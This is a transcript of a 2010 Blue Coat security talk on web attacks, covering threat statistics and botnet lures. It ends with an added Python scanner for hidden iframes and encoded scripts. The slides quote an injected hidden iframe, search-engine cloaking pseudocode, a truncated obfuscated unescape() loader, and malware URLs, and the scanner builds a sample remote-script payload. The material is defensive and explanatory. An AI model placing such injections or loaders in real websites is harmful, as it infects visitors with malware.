2010-11 The Anatomy of a Web Attack
by Dennis Pike, Systems Engineer, Bluecoat Systems

2010-11 The Anatomy of a Web Attack: Presentation Transcript

  • The Anatomy of a Web Attack. Dennis Pike, Systems Engineer, Geo Specialists Lead – Americas Security, dennis.pike@bluecoat.com. Blue Coat Systems Confidential. Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
  • Agenda
      • State of the Web: top categories; top attacks
      • The Anatomy of a Web Attack: lures to web threats; examples
      • Dynamic Link Analysis
  • Best of the Worst
      • Top Web category? Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity.
      • Top Web threat? Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer.
      • New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009.*
      • Average lifetime of sites that redirect users to Web pages that try to install scareware decreased, with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010.*
      • *Google Inc.
  • Email vs Social Networking
      • Do more people use email or social networking sites? According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.
  • Noteworthy Items: Argument for Video (HTTP and Streaming). Two ranked lists of Domain: Client% (legend: video, filesharing)
      • Left column (~Total~: 100%): youtube.com 35.7800; hotfile.com 7.427; apple.com 4.901; ninjacloak.com 4.205; rapidshare.com 4.135; megaupload.com 2.977; googlevideo.com 2.66; fbcdn.net 1.791; mediafire.com 1.492; windowsupdate.com 1.305; playstation.net 1.241; fileserve.com 1.187; 4shared.com 1.031; zshare.net 0.7793; dailymotion.com 0.6476; google.com 0.588; facebook.com 0.5764; novamov.com 0.5737; microsoft.com 0.4747; farmville.com 0.4626
      • Right column (~Total~: 100.00%): youtube.com 36.28; rapidshare.com 6.36; hotfile.com 5.26; apple.com 3.98; ninjacloak.com 3.97; megaupload.com 2.54; googlevideo.com 2.33; fbcdn.net 1.85; fileserve.com 1.75; playstation.net 1.74; mediafire.com 1.68; windowsupdate.com 1.42; zshare.net 0.78; facebook.com 0.65; dailymotion.com 0.62; 4shared.com 0.6; novamov.com 0.54; google.com 0.54; farmville.com 0.52; adobe.com 0.41
  • Changing Web Habits
      • Top 10 Categories – 2009 (WebFilter/WebPulse, 62M+ Users): 1. Social Networking; 2. Web Advertisements; 3. Search Engines/Portals; 4. Personals/Dating; 5. Pornography; 6. Computers/Internet; 7. Audio/Video Clips; 8. Adult/Mature Content; 9. Web Email; 10. Illegal/Questionable
      • Social Networking: moved to #1 from #2 position; represents 25% of Top 10 requests
      • Web Email: dropped to #9 from #5 position; users migrating to social networking
      • Cyber Crime Leverages: search engine poisoning; Fake AV and Codec updates; popular site injections; Death, Drama & Disaster lures; Health & Wealth scams
  • Web Threats Rising Exponentially
      • 2/3 of all known malicious code threats in 1 year (Symantec, April ’09)
      • 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
  • Distribution Power
      • Botnet computing power to: pitch worthless products; hijack online banking accounts; steal corporate data
      • Top 5 Botnets in 2009 (USA TODAY Research – March 2010)
          • Botnet: Zeus, Koobface B, Koobface D, Monkif A, Clickbot
          • Peak number of active bots: 1,070,000; 812,000; 599,000; 506,000; 375,000
          • How it spreads: Search Results, Facebook, Twitter, Social Networking
  • An Invitation to Crime (USA TODAY Research – March 2010)
      • 1 – An automated program logs on to social network using stolen user credentials.
      • 2 – Program messages user's friends asking them to click on a link to a photo or video.
      • 3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.
      • 4 – The bot steals the PC owner's logon credentials, starting the cycle again.
  • Web Evolution
      • Static Pages → Dynamic Pages
      • Dynamic Pages → Interactive Pages
      • Publishing Model → Community Model
      • Single Host Pages → Multi-Host Pages
      • Nice to Have → Must Have
  • Multi-Host Pages. SPORT: 6 Domains, 13 Hosts, 147 Requests, 504 KB, 14.5 Seconds
  • Paths to Malware Infection (diagram labels: Link Farms; Infected Site; Search Engine; Blogs, Forums; Relay; Bait; Malware)
  • End User … Infected Site
      • Page requested: www.inka.com
      • Markup returned:
          <html> … <iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id="header"> … </html>
      • Hidden frame loads: homenameregistration.cn/in.cgi?income12
  • Web 2.0 and Search Engines (diagram labels: Forums; Blogs; Wikis; Guestbooks; WWW; Search Engine View)
  • Web 2.0 and Search Engines (diagram labels: WWW; Search Engine View; Links…; Words…)
  • Hijacked Website
      • Site layout: xdesignstudios.com / dir1 / index.php and live.js
      • index.php (pseudocode):
          if ("search engine") {
              echo "…indexable content…"
          } else {
              echo '<body><script src="live.js"></script>'
          }
      • Indexed query strings:
          …
          id=fall+printable+coloring+pages
          id=free+printable+easter+drawings
          id=disney+printable+cartoon+characters
          id=free+printable+halloween+sheets
          id=girls+free+printable+organizer
          id=in+store+printable+catherines+coupons
          …
  • End User … Search Engine Redirect
      • Request: index.php?id=hannah-montana-printable-birthday-invitations
      • Response: <body><script src="live.js"></script>
      • live.js: document.write(unescape(%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…
      • http://cracksinside.com/red/gen.js
  • What just happened? (diagram labels: WWW; Search Engine View; Links…; Words…; Redirect)
  • Recent Examples - VBMania
      • Email text: www.sharedocuments.com/library/PDF_Document21.025542010.pdf
      • members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
  • Recent Examples – Fake Warez
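
The two injection patterns shown in the "Infected Site" and "Search Engine Redirect" slides (an invisible iframe pointing at another host, and a script hidden inside document.write(unescape(...))) can both be checked for when reviewing a page. The Python scanner below is an added example, not part of the original presentation; the host names, the sample markup and the function names (scan, decode_escaped_writes) are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

class HiddenFrameFinder(HTMLParser):
    """Collect iframes that are invisible to the user and load from another host."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if host and host != self.page_host and (tiny or hidden):
            self.hits.append(a["src"])

# A run of at least eight %XX escapes passed as a string to unescape().
ESCAPED = re.compile(r"unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}){8,})")

def decode_escaped_writes(js):
    """Decode percent-escaped strings passed to unescape() so they can be read."""
    return [unquote(m.group(1)) for m in ESCAPED.finditer(js)]

def scan(page_host, html, js=""):
    """Return hidden cross-host iframes and decoded strings that carry a script tag."""
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    decoded = decode_escaped_writes(js)
    return {"hidden_iframes": finder.hits,
            "decoded_scripts": [d for d in decoded if "<script" in d.lower()]}

# Constructed sample input (placeholder hosts, not the domains from the slides).
SAMPLE_HTML = ('<html><iframe src="http://relay.example.net/in.cgi?x" width=1 height=1 '
               'style="visibility: hidden"></iframe><div id="header"></div>'
               '<iframe src="http://www.example.com/map" width=400 height=300></iframe></html>')
PAYLOAD = '<SCRIPT src="http://redirect.example.net/gen.js"></SCRIPT>'
SAMPLE_JS = 'document.write(unescape("%s"));' % "".join("%%%02X" % b for b in PAYLOAD.encode())

if __name__ == "__main__":
    print(scan("www.example.com", SAMPLE_HTML, SAMPLE_JS))
```

The visible same-host iframe in the sample is not reported; only the 1x1 hidden frame on the other host and the decoded script tag are.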